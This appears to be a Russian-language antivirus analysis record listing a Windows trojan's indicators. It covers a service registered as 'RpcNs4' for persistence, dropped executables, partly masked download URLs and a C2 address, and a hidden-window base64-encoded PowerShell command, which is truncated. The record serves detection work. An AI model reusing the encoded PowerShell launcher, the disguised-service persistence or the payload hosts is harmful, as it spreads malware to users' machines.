Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\RpcNs4] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\RpcNs4] 'ImagePath' = '"%WINDIR%\SysWOW64\api-ms-win-security-lsalookup-l1-1-0\RpcNs4.exe"'
- 'RpcNs4' "%WINDIR%\SysWOW64\api-ms-win-security-lsalookup-l1-1-0\RpcNs4.exe"
- 'RpcNs4' %WINDIR%\SysWOW64\api-ms-win-security-lsalookup-l1-1-0\RpcNs4.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAFMATQBXAEYAaQB3AHoAPQAnAEwAUABKAEcASAB4AHMAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAHUAUgBgAGkAdABZAGAAcAByAG8AdABPAGMATwBsACIAIAA9AC...
- %HOMEPATH%\569.exe
- %WINDIR%\syswow64\api-ms-win-security-lsalookup-l1-1-0\rpcns4.exe
- %HOMEPATH%\569.exe в %WINDIR%\syswow64\api-ms-win-security-lsalookup-l1-1-0\rpcns4.exe
- '76.##.179.47':80
- http://me#######tedecoracoes.com.br/update/ux5_iq061_x7f/
- http://do####emedia.com/dbm-salon/1g_9s_98t0/
- http://76.##.179.47/bo6KEBw74xoGEW3/Y7aDh270AloyfNNoN2O/
- DNS ASK me#######tedecoracoes.com.br
- DNS ASK do####emedia.com
- '%HOMEPATH%\569.exe'
- '%WINDIR%\syswow64\api-ms-win-security-lsalookup-l1-1-0\rpcns4.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAFMATQBXAEYAaQB3AHoAPQAnAEwAUABKAEcASAB4AHMAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAHUAUgBgAGkAdABZAGAAcAByAG8AdABPAGMATwBsACIAIAA9AC...' (со скрытым окном)